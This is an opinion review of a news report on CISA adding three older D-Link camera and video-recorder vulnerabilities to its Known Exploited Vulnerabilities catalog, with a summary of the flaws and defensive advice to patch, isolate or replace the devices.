These D‑Link Devices Are Compromised — Replace Them Now
Hello everyone. Let’s scrub in and talk about a write-up that tries to warn you about active exploitation against aging D-Link gear, then occasionally drops the scalpel mid-surgery. The piece delivers the essentials — CISA has added three older D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog — but it also stumbles with vague phrasing, thin context, and a correction that shouldn’t have been necessary in the first place. Think of it as a patch note that tells you the boss got buffed, but forgets to explain the new mechanics.
What the article actually says
Quick summary
– CISA added three old, high-severity D-Link vulnerabilities to the KEV catalog due to evidence of active exploitation in the wild.
– These issues affect D-Link Wi‑Fi cameras (DCS‑2530L, DCS‑2670L) and a video recorder (DNR‑322L) — not routers, as the story clarifies in a post-publication correction.
– The vulnerabilities (from 2020 and 2022) include remote admin password disclosure, an authenticated command injection in cgi-bin/ddns_enc.cgi, and a download of code without integrity check on the DNR‑322L that can lead to OS-level command execution by an authenticated attacker.
– There are no details in the article about current exploitation techniques. It does note a December 2024 FBI advisory warning of scanning activity against webcams vulnerable to CVE‑2020‑25078.
– CVE‑2020‑40799 is tied to a model that hit end‑of‑life in November 2021; users of DNR‑322L are advised to discontinue and replace it. Fixes for the other two flaws were provided by D‑Link in 2020.
– Federal Civilian Executive Branch agencies are required to mitigate by August 26, 2025.
| Affected Device(s) | Severity (CVSS) | Issue Summary |
| D-Link DCS-2530L, DCS-2670L | 7.5 | Unspecified flaw leading to remote administrator password disclosure |
| D-Link DCS-2530L, DCS-2670L | 8.8 | Authenticated command injection in cgi-bin/ddns_enc.cgi |
| D-Link DNR-322L | 8.8 | Download of code without integrity check enabling authenticated OS-level command execution |
“Users still relying on DNR‑322L are advised to discontinue and replace them.”
The good: Clear triage, necessary alert
- Signal over noise: It flags active exploitation and puts names to the patients — the specific D-Link camera models and the DNR-322L recorder — instead of hand-waving about “IoT gear.” That’s effective triage.
- Severity and symptoms: The CVSS scores and descriptions aren’t buried. Remote admin password disclosure and authenticated command injection are not garden-variety coughs; they’re systemic risks.
- Time-bound mitigation: A firm date for FCEB agencies (August 26, 2025) gives the piece operational weight. Deadlines focus the mind, like a timer ticking down in a raid.
- Transparency via correction: The post-publication fix clarifying cameras/recorders (not routers) shows at least some willingness to stitch up a mistake rather than letting the wound fester.
The not-so-good: Vague incisions and missing aftercare
Now for the part where the attending physician raises an eyebrow. The article repeatedly gestures at critical details, then refuses to commit. “Evidence of active exploitation” is important, but readers get no anatomy of the attacks, no indicators, and no victim profile. It’s like telling the team the boss enrages at 40% and then refusing to explain the new phase.
- Diagnostic ambiguity: The piece references vulnerabilities “from 2020 and 2022,” but only explicitly names CVE‑2020‑25078 and CVE‑2020‑40799. The mapping between the bullet points and those IDs is left to reader inference — not ideal when precision matters.
- Patch status handwave: We’re told “fixes for the other two flaws were [provided] by D‑Link in 2020,” which is useful, but links, version numbers, or update guidance are absent. That’s like prescribing antibiotics without dosage or duration.
- Exploit specifics: “Actively scanning” is meaningful context, but the article doesn’t bridge it to current exploitation patterns beyond acknowledging that it’s happening. No IOCs, no network fingerprints, no telltale logs to watch — nothing to equip defenders beyond “be aware.”
- Product confusion residue: The correction is appreciated, but leading with a router reference in the first place undermines confidence. If you confuse the organ you’re operating on, the malpractice board starts taking notes.
- Mitigation for non-FCEB: The government deadline is clear, but the practical “what should everyone else do today?” is implied rather than stated. Owners of EoL gear get the hard stop (“discontinue and replace”), but camera owners with patches available need crisp next steps.
What readers can actually do right now
- If you have a DNR‑322L: Treat it as EoL equipment. Discontinue and replace it. That’s the article’s clearest directive.
- If you run DCS‑2530L or DCS‑2670L: Apply the vendor’s 2020 fixes referenced by the article. Verify firmware versions match the latest available for those models.
- Assume exposure: Because CISA’s KEV addition implies observed exploitation, segment these devices, disable remote access if not strictly required, and monitor for abnormal behavior. Yes, it’s the “wipe, reimage, re‑equip” of the IoT world.
- Plan your upgrade path: For any model approaching or at EoL, replacement is the only sustainable cure. You can’t heal a patient the hospital has discharged permanently.
Style and substance: Does the reporting hold up?
The framing is timely and the intent is sound: highlight that old vulnerabilities in ubiquitous consumer gear are back in the spotlight because attackers didn’t stop poking at them. But the execution is uneven. The article gives you the boss name, health bar, and a rough idea of damage numbers; it withholds the move list, resistances, and loot table. For defenders, that’s not a full strat — it’s a teaser trailer.
As a clinician, I appreciate the high-level diagnosis. As an operator, I want the chart, labs, and the post-op instructions. Without those, the risk is that people skim “active exploitation,” nod gravely, and proceed with the same weekend plans, none the wiser about what to patch, isolate, or retire. The correction about routers adds a faint aftertaste of haste — the kind you get when a patch note ships five minutes before the servers go live.
Verdict
Overall impression: mixed. The article surfaces a necessary alert with concrete device names, CVSS context, an explicit government mitigation deadline, and a clear “discontinue and replace” call for DNR‑322L. That’s valuable. But it withholds too much practical detail, leans on vague exploitation references, and needed a correction on device types. Useful as a nudge, insufficient as a playbook. Treat it as your triage slip — then go get the surgical plan.
And that, ladies and gentlemen, is entirely my opinion.
Article source: CISA Adds 3 D-Link Router Flaws to KEV Catalog After Active Exploitation Reports, https://thehackernews.com/2025/08/cisa-adds-3-d-link-router-flaws-to-kev.html
